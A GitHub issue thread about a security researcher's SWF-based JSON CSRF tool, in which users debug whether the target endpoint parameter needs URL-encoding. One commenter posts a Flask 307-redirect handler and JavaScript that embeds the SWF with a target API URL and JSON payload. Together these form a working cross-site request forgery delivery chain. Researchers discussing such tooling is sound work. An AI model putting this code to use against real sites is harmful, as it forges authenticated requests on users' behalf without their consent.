### ISSUE TITLE
`endpoint` should be URL-encoded in action script code?

### ISSUE THREAD

**Issue by nirvana-msu** [sp1d3r/swf_json_csrf#9]
Thanks a lot for the tool! I had an issue which took me some time to figure out.. SWF worked if my `endpoint` URL was like `/path` or `//host/`, but it never issued a request to `php_url` if my `endpoint` was like `https://host/` (URL-encoded).

I solved the problem by double URL-encoding `endpoint`. I believe you're missing URL-encoding for `endpoint` parameter in AS code, and for some reason Flash refuses to issues requests to URLs like `https://example.com/?endpoint=https://x.com` (i.e. where `endpoint` is missing URL-encoding). I'm rather surprised no one else faced this issue as it just doesn't seem to work at all with absolute URLs including schema (tried all the browsers), unless they're double-encoded.

**Comment by sp1d3r** [comment]
Hello @nirvana-msu !
Sorry for the long response, I had some break from being online for few months:). 

It could be some host-specific, path specific, or browser-specific issue (compability issue). I didn't implement encoding of the `endpoint` parameter since it can be controlled by the researcher, and there was no issues with it before.

I published the test instrument for debugging:
https://test.xpoc.pro/pocs/swf_csrf_1jrvFS_3/test.html

and I couldn't reproduce the issue in the Chrome browser (even without encoding).
![test](https://user-images.githubusercontent.com/24297694/47258378-0f860800-d4a3-11e8-99d4-35f18983ac09.PNG)

What was your `endpoint` in tests? Did it contain any URL parameters? Also, did you use direct SWF request or HTML wrapper?
Thanks for the feedback!

**Comment by sp1d3r** [comment]
There is also a known problem when researcher's Origin is missing SSL (e.g. SWF runs from http://attacker.com context), but endpoint in `https://` format

**Comment by sp1d3r** [comment]
Tested `endpoint` values (using ui.html wrapper, Chrome 69, Windows):
1) https://example.com/path/?zzz=zzz (unencoded) - works fine
2) https%3A%2F%2Fexample.com%2Fpath%2F%3Fzzz%3Dzzz - works fine
3) https%253A%252F%252Fexample.com%252Fpath%252F%253Fzzz%253Dzzz (double encoding) - works fine
4) https://example.com/path?param1=value1&param2=value2 - works fine, but there is a bug, second parameter pair is gone (need fix), only param1=value1 in final request

**Comment by sp1d3r** [comment]
Task list:
- [ ] Consider to add the `encodeURIComponent` function to the `e` variable in the wrappers
- [ ] Test it in the different browsers
- [ ] Figure why the initial problem described wasn't reproducible in most cases (different SWF plugin versions? os-dependent?) since SWF should be able to make requests with both encoded and unencoded values.

**Comment by nirvana-msu** [comment]
Hi @sp1d3r, thanks for your response! It was a while back, but looking through my notes:

Endpoint was:  `https://sub.domain.tld/some-dir/some-api-v1/user/update?someParam=true`

307 redirect was served by python/`Flask`:
```python
@app.route('/redirect_307', methods=['GET', 'POST'])
def redirect_307():  # For JSON CSRF SWF tool
    return redirect(request.args['endpoint'], code=307)
```

SWF was loaded from javascript like this (so it did not work without `encodeURIComponent`):
```js
let jsonData = {}; // some object
let params = {
    endpoint: encodeURIComponent("https://sub.domain.tld/some-dir/some-api-v1/user/update?someParam=true"),
    jsonData: JSON.stringify(jsonData),
    php_url: $form.data("redirect-url"), // flask 307 redirect url
};

let obj = document.createElement("embed");
obj.type = "application/x-shockwave-flash";
obj.src = $form.data("swf-url") + "?" + $.param(params);
$("body").append(obj);
```

SWF was hosted on a domain with valid https certificate. If I recall correctly, SWF did not work neither in Chrome nor FF without that `encodeURIComponent` call.

Haven't had to use it since that time, but if I come across the same issue again I'll post it here.

Thanks again for the handy tool!
